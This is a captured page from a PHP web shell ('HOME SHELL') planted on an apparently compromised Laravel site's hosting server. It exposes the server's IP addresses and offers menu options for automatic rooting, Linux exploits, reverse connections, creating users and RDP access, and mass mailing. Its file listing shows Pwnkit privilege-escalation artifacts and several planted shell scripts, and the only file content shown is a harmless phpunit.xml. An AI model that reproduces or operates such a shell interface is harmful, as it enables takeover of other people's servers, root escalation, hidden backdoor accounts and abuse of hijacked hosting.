Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo14.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.agents
[ DIR ]
drwxrwxrwx
.git
[ DIR ]
drwxrwxrwx
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxrwxrwx
bootstrap
[ DIR ]
drwxrwxrwx
c1jwenv
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxrwxrwx
cugadtq
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxrwxrwx
dnophre
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxrwxrwx
iypgkvh
[ DIR ]
drwxr-xr-x
o1xitqc
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-x---
rcogkq1
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxrwxrwx
routes
[ DIR ]
drwxrwxrwx
scripts
[ DIR ]
drwxrwxrwx
storage
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
unjgbvc
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxrwxrwx
zusgjhy
[ DIR ]
drwxr-xr-x
.env
621
B
-rw-rw-rw-
.env.example
543
B
-rw-rw-rw-
.htaccess
199
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.phpunit.result.cache
134
B
-rw-rw-rw-
222.php
15.76
KB
-rw-r--r--
README.md
1.88
KB
-rw-rw-rw-
artisan
339
B
-rw-rw-rw-
composer.json
1.59
KB
-rw-rw-rw-
composer.lock
300.35
KB
-rw-rw-rw-
composer.phar
3.47
MB
-rw-rw-rw-
def.html
263
B
-rw-r--r--
filefuns.php
5.86
KB
-r--r--r--
goat1.php
143.87
KB
-rw-r--r--
package.json
287
B
-rw-rw-rw-
phpunit.xml
817
B
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
random.php
52.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpunit.xml
<?xml version="1.0" encoding="UTF-8"?> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="vendor/phpunit/phpunit/phpunit.xsd" bootstrap="vendor/autoload.php" colors="true"> <testsuites> <testsuite name="Feature"> <directory>tests/Feature</directory> </testsuite> </testsuites> <source> <include> <directory>app</directory> </include> </source> <php> <env name="APP_ENV" value="testing"/> <env name="CACHE_STORE" value="array"/> <env name="DB_CONNECTION" value="sqlite"/> <env name="DB_DATABASE" value=":memory:"/> <env name="QUEUE_CONNECTION" value="sync"/> <env name="SESSION_DRIVER" value="array"/> </php> </phpunit>
Close